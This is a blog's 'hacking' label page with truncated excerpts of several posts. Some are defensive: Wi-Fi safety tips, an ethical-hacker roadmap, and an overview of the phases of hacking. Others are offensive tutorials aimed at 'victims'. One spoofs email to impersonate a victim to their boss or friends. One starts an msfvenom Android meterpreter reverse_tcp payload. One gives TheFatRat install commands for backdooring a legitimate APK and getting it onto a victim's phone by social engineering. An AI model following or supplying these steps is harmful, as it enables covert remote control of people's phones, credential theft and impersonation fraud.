Skip to main content

Posts

Showing posts with the label hacking

HOW HACKERS USE WIRESHARK FOR PASSWORD SNIFFING: WHAT DOES WIRESHARK DO?

Hey there, let's talk about how hackers sniff passwords. It's like spies listening in to steal secrets. Here's how they do it and what you can do to stay safe. Imagine data packets as envelopes carrying sensitive information across the internet. Hackers use tools like Wireshark to capture these packets. It's like eavesdropping on a conversation. They often find plaintext passwords or authentication credentials in these packets, which they exploit to gain unauthorized access. Another trick hackers use is ARP spoofing. They mess with the network system to redirect traffic through their devices. This way, they can intercept and grab passwords as they travel. There's also something called a Man-in-the-Middle (MitM) attack. Hackers sneak in between your device and the server you're talking to. It's like someone jumping into your phone call. They can then see everything you send, including passwords. To keep hackers out, use secure ways to send data, like HTTPS or...

A Roadmap to Becoming an Ethical Hacker

  Are you fascinated by the world of cybersecurity? Do you dream of using your tech skills for good and making a difference in the digital realm? If so, then embarking on the path of an ethical hacker could be your calling! Ethical hackers, also known as white-hat hackers, play a crucial role in ensuring the security of computer systems and networks. They use their expertise to identify vulnerabilities, test security measures, and protect against cyber threats. It's a rewarding and dynamic field that offers endless opportunities for growth and impact. But how do you get started on this exciting journey? Here's a roadmap to guide you: Build Your Knowledge: Start by learning the fundamentals of computer science, cybersecurity, and networking. Take online courses, read books, and immerse yourself in hands-on projects to develop a strong foundation. Hands-On Practice: Dive into cybersecurity labs, challenges, and simulations to apply your knowledge in real-world scenarios. Practic...

HOW TO GET PROTECTED FROM GETTING HaCkED !!

           W here was the last public place you visited that had Wi-Fi? These days, nearly every coffee shop, library, airport and hotel offer a way to access the internet from your cell phone or other mobile device. That means the information you have on your phone could be available to hackers in the area – unless you’ve taken steps to protect your data. So these are the 6 tips below i am gonna say in this tutorial : E xicted so lets get started !! 1. Don't access personal and financial data while using public WiFi:    This may seem like a no-brainer, but you’d be surprised how many people check their bank accounts or make purchases with a credit card while using public WiFi. It’s best to do those things on a secure connection.            2.Install Security Software Tools on Your Mobile Device: Antivirus software and anti-malware software are not limited to computers onl...

What are Phases of Hacking ?

PHASES OF HACKING Phases of Hacking:- There are mainly 5 phases in hacking. Not necessarily a hacker has to follow these 5 steps in a sequential manner. It’s a step wise process and when followed yields a better result. 1.Reconnaissance 2.Scanning 3.Gaining Access 4.Maintaining Access 5.Clearing Track Now i will explain each of the phases clearly !! 1. Reconnaissance: This is the first step of Hacking. It is also called as Footprinting and information gathering Phase. This is the preparatory phase where we collect as much information as possible about the target. We usually collect information about three groups,        Network Host People Involved There are two types of Footprinting: Active: Directly interacting with the target to gather information about the target. Eg: Using Nmap tool to scan the target Passive: Trying to collect the information about the target without directly accessing the target. This involves collecting information from social media, public w...

EMAIL SPOOFING

  Email  Spoofing Intro:- This is a very handy method and it comes pre-installed in Kali Linux and all you need to do is to create an SMTP server to send emails. This is very useful and can use the server free of cost or if you are interested you can upgrade it to premium but I prefer the free version of it. By this method, you can send an email to your friend by using his own mail.id. SO, let's Dive in  Requirements:- Kali Linux SMTP server Mail.ID of victim Mail.ID of the victim's boss or friends Procedure:- create an SMTP server by using Sendinblue.com  it's free of cost and used by many marketers.  sign-in page of Sendinblie.com After creating an account successfully enter your details like company name, address, No-of employees, etc but do not forget to give your original phone number because it sends an OTP.   So, after finishing all the required formalities and finish setting up now go to the transactional section and check your SMTP server, port, us...

HOW TO HACK ANDROID USING PAYLOAD

  CREATING A PAYLOAD USING METASPLOIT Hey guys!! Today, I am gonna explain you how to create a Payload using Kali Linux Terminal. In this tutorial, we are going to use the best and wellknown framework. I hope you guess it, Yes! that is   Metasploit Framework. It is one of the best framework among all the frameworks. What is Metasploit Framework ? The  Metasploit Framework  is an open source penetration testing and development platform that provides exploits for a variety of applications, operating systems and platforms.  Metasploit  is one of the most commonly used penetration testing tools and comes built-in to  Kali Linux .       Requirements: 1. Pc with Kali Linux installed in it.    Lets get started: 1. Now open your Kali Linux Terminal ! 2. Use the following Command to create a payload using Metasploit:      sudo msfvenom -p android/meterpreter/reverse_tcp            ...

Embed Backdoor in any Android app | Android Hacking | Tricky Hash |

  H OW TO  CREATE A ANDROID TROJAN INTRO Everybody  install and use apps these days. So, the easiest way to hack a android by embed a Backdoor to a normal apk File. Now, install this apk file in your Victim's phone by using some Social Engineering trick.  When it is executed the user will see a normal app but in the same time our Backdoor will be running in the Background. REQUIREMENTS A Legitimate android apk file. Kali Linux  The FATRAT (Linux Tool) PROCEDURE   To embed Backdoor in any legitimate apk, we use fatrat. We have to install Fatrat in out terminal. Fatrat is used to generate local or remote listeners. It can generate payloads in various formats.  To Install Fatrat we'll have to use the following commands:  git clone  https://github.com/Screetsec/TheFatRat.git After cloning into TheFatRat now type: ls (enter) cd TheFatRat (enter) ls (enter) chmod +x setup.sh (enter) ls (enter) ./setup.sh (enter) It will automatically install all th...